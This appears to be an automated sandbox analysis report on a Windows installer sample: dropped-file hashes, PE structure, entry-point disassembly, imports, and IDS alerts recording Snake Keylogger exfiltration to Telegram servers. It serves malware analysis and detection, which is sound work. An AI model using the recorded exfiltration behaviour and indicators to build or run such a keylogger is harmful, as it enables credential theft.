                                                                                                              SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):274384
                                                                                                              Entropy (8bit):7.777955751363666
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:t2KrjgMsvnR11IlECV7ixu2m0ZMIjZgIAbd0nUaA6wFaw:5sMsvnX1ICw2rZMyMb3a9wFb
                                                                                                              MD5:5D79775148C09B7A085EDC598B46C3F1
                                                                                                              SHA1:C07D2987A7351B84D333D8AE959D01F753B6BF65
                                                                                                              SHA-256:7D62148C2FF50EB7EB0F16DDC5D68A8A26CBB88FBF4C77ADC7B973F5F7F359A0
                                                                                                              SHA-512:6352578460E4D21D0792B8F55C0A7531AB8E71000EB9921BB891D7B17407D2152B9FF5D4A4BBFF4326D5643EE63CDC699FF22C963F69230D7A0A195CF75D46E7
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:..................t.....2.".&..c..1......aa............]]........................!........<..q.[[[.C..II.....@............^.........'...T.......,........7................................7............++......m......Z.................11....HHHH.....)........................9..............xxxxxxx.....B......u.%.,....".......W.......................SS...1..................L....N...^...........0.......KK.......................""...........]]...__.Y..................!.....c.....eeee................................777........UUU......\\.kkk..................ggg....5....]]]].m....h.777..@@.f........11111............>>>.........U.....BB.+.........................jj...DDDDDDD.y.....v....9999........2.....3333.JJ.ssss.......b...........SSS.....!...nn..........}}}}}}..FF..f.W.......................DDD.v....................H.....................................................--......d....'......................WW.....3..LL........../.+++.........kk........................,.J..................g..}}
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):68445
                                                                                                              Entropy (8bit):4.608525493692617
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:dhiMuKUm30j8f0XnHuQhpZQ+GaZEnS4yW:XULj8sXHpjJJW
                                                                                                              MD5:E49A8F6BEE0252312ED665FD40B5666E
                                                                                                              SHA1:F6693AB5F6453C1FABA444E433539D03E09C2FF8
                                                                                                              SHA-256:7EC95F001996C574DA52DD9316D0CA55F4570815CCA6FDB52DBD95D895A4066B
                                                                                                              SHA-512:1D75A9921A10D9FCABB92CEE82A820E0AE885FD379C9E2439491AC4D309C138204815188416E3E262D3F6BD7A7A8370609BD9996FAE7E6027FE63A6B62BC6FC3
                                                                                                              Malicious:false
                                                                                                              Preview:..-..%.........PPP.X.....vv......O.aa.444......--..k................F...jj.....rr........QQQ..{{{{.n...................6............\\................P.==.........$................>>..~~~~..Y.......MM.................k............EE....aaaaa....M....bbb..d...........m...........................""..............22222222..GG.s.....<.O..r..55.....KK..................WW..kk................s.ll.B...&.........CC....`.....*.........b....---.............//................................C...................!......\\..5.GGGG..Y.............. .........................C...g.....................{..x.........<<....q...B.........K......~~..."""".......................................o.............0.....W....rr........qq............g.......T.....~.........................{................8...........].....n.YYY...........................................||..????.......J........CC...........}...........................??........Y.AAA...S...................eee..........gg....ww........]..."".....[[....
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):139354
                                                                                                              Entropy (8bit):1.2473328695625903
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                              MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                              SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                              SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                              SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                              Malicious:false
                                                                                                              Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12288
                                                                                                              Entropy (8bit):5.719859767584478
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                              MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                              SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                              SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                              SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: rXKfKM0T49.exe, Detection: malicious, Browse
                                                                                                              • Filename: b5BQbAhwVD.exe, Detection: malicious, Browse
                                                                                                              • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                                                                              • Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse
                                                                                                              • Filename: V7OHj6ISEo.exe, Detection: malicious, Browse
                                                                                                              • Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse
                                                                                                              • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                                                                              • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                              • Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse
                                                                                                              • Filename: 4UQ5wnI389.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1467374
                                                                                                              Entropy (8bit):5.470993464057012
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:usMI+CTWyyKOFko3xX3y4bz2lWwWo6rSTZyBwe:EIPanKOSoBXbz2luo6rS1yBD
                                                                                                              MD5:45517799D523F02B1C97A24B9C02AC51
                                                                                                              SHA1:6C1ABD841208D3C666FB9A6712036687417ACA2A
                                                                                                              SHA-256:CFE314D84F1C8A06E64A33FC2D1D21DEF5EA615346898D1B9B8CDF5C90C74725
                                                                                                              SHA-512:8FCDABA6F7ACBDF64843ED8DC5361164F00588CD72F199165E25C708331E75C9E34EAAF0C6F3EDF5983874B8D7C8C7F9CEEC7CA74716A3028FAF9C333A418727
                                                                                                              Malicious:false
                                                                                                              Preview:.6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...........y...h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                              Entropy (8bit):7.959228516971741
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:czHx16QwGQ.exe
                                                                                                              File size:1'014'160 bytes
                                                                                                              MD5:1a0fe25178e09cf0facc1f7bd6f221a8
                                                                                                              SHA1:51e3ccc0373f62778f0d3ccc79f5f16136f77129
                                                                                                              SHA256:84b2e764db4bcdad20e5b5455c35a59e9382d29c77ee3ce50940de23691a85a8
                                                                                                              SHA512:619f51488cd6a83690587883bcfa64e0009fdbe8ef60c31133b310fc2b49743617557421415e71f0fc44c13ef65aac36b3e8dc5af24ab12c32bb27bb33a2a8d7
                                                                                                              SSDEEP:24576:9jwKCN6c+42RBHzWeyBc4naJ2ZssPoZT0tDVQX:V1Cwc+4YHyB9ap3ZT1
                                                                                                              TLSH:0125234D3357DE2BC2E0CB71BF479B5A7DAD9E000D80A96301A43F8A7533991827E7A5
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                              Icon Hash:46224e4c19391d03
                                                                                                              Entrypoint:0x4034a5
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                              Instruction
                                                                                                              sub esp, 000002D4h
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              push 00000020h
                                                                                                              pop edi
                                                                                                              xor ebx, ebx
                                                                                                              push 00008001h
                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                              mov dword ptr [esp+10h], 0040A230h
                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                              call dword ptr [004080ACh]
                                                                                                              call dword ptr [004080A8h]
                                                                                                              and eax, BFFFFFFFh
                                                                                                              cmp ax, 00000006h
                                                                                                              mov dword ptr [0042A24Ch], eax
                                                                                                              je 00007F15F08251A3h
                                                                                                              push ebx
                                                                                                              call 00007F15F082846Dh
                                                                                                              cmp eax, ebx
                                                                                                              je 00007F15F0825199h
                                                                                                              push 00000C00h
                                                                                                              call eax
                                                                                                              mov esi, 004082B0h
                                                                                                              push esi
                                                                                                              call 00007F15F08283E7h
                                                                                                              push esi
                                                                                                              call dword ptr [00408150h]
                                                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                                                              cmp byte ptr [esi], 00000000h
                                                                                                              jne 00007F15F082517Ch
                                                                                                              push 0000000Ah
                                                                                                              call 00007F15F0828440h
                                                                                                              push 00000008h
                                                                                                              call 00007F15F0828439h
                                                                                                              push 00000006h
                                                                                                              mov dword ptr [0042A244h], eax
                                                                                                              call 00007F15F082842Dh
                                                                                                              cmp eax, ebx
                                                                                                              je 00007F15F08251A1h
                                                                                                              push 0000001Eh
                                                                                                              call eax
                                                                                                              test eax, eax
                                                                                                              je 00007F15F0825199h
                                                                                                              or byte ptr [0042A24Fh], 00000040h
                                                                                                              push ebp
                                                                                                              call dword ptr [00408044h]
                                                                                                              push ebx
                                                                                                              call dword ptr [004082A0h]
                                                                                                              mov dword ptr [0042A318h], eax
                                                                                                              push ebx
                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                              push 000002B4h
                                                                                                              push eax
                                                                                                              push ebx
                                                                                                              push 004216E8h
                                                                                                              call dword ptr [00408188h]
                                                                                                              push 0040A384h
                                                                                                              Programming Language:
                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                              RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                              RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                              RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                              RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                              RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                              RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                              RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                              RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                              RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                              RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                              RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                              RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                              RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                              RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                              RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                              RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                              RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                              RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                              RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                              RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                              RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                              DLLImport
                                                                                                              KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-10T23:38:48.199385+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849735216.58.206.46443TCP
                                                                                                              2025-01-10T23:38:53.628248+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849770193.122.6.16880TCP
                                                                                                              2025-01-10T23:39:00.831434+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849770193.122.6.16880TCP
                                                                                                              2025-01-10T23:39:01.479700+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849821149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:01.786657+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849821149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:02.909553+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849831193.122.6.16880TCP
                                                                                                              2025-01-10T23:39:03.511066+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849837149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:03.820929+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849837149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:04.534573+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849843193.122.6.16880TCP
                                                                                                              2025-01-10T23:39:05.091683+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849848149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:05.562695+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849848149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:06.875951+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849858149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:07.214329+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849858149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:08.463009+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849870149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:08.866445+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849870149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:10.124870+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849882149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:10.471564+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849882149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:11.748841+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849894149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:12.121448+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849894149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:13.393119+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849909149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:13.759190+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849909149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:15.071860+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849920149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:15.579856+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849920149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:16.886597+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849933149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:17.124804+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849933149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:18.401899+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849945149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:18.724664+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849945149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:20.015911+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849959149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:20.369646+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849959149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:21.647836+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849971149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:21.953870+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849971149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:23.224937+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849983149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:23.463010+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849983149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:24.739870+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849995149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:25.033820+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849995149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:26.301176+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850007149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:26.604848+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850007149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:27.882638+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850010149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:28.114488+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850010149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:29.424430+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850012149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:29.654705+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850012149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:30.938589+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850014149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:31.151584+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850014149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:32.440265+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850016149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:32.720784+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850016149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:36.938687+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850018149.154.167.220443TCP
                                                                                                              2025-01-10T23:39:37.230195+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850018149.154.167.220443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 10, 2025 23:38:47.154973984 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.154999018 CET44349735216.58.206.46192.168.2.8
                                                                                                              Jan 10, 2025 23:38:47.155075073 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.174654961 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.174670935 CET44349735216.58.206.46192.168.2.8
                                                                                                              Jan 10, 2025 23:38:47.819293976 CET44349735216.58.206.46192.168.2.8
                                                                                                              Jan 10, 2025 23:38:47.819410086 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.820804119 CET44349735216.58.206.46192.168.2.8
                                                                                                              Jan 10, 2025 23:38:47.820867062 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.890839100 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.890857935 CET44349735216.58.206.46192.168.2.8
                                                                                                              Jan 10, 2025 23:38:47.891196966 CET44349735216.58.206.46192.168.2.8
                                                                                                              Jan 10, 2025 23:38:47.891258955 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.897267103 CET49735443192.168.2.8216.58.206.46
                                                                                                              Jan 10, 2025 23:38:47.939331055 CET44349735216.58.206.46192.168.2.8
                                                                                                              Jan 10, 2025 23:38:48.199362040 CET44349735216.58.206.46192.168.2.8
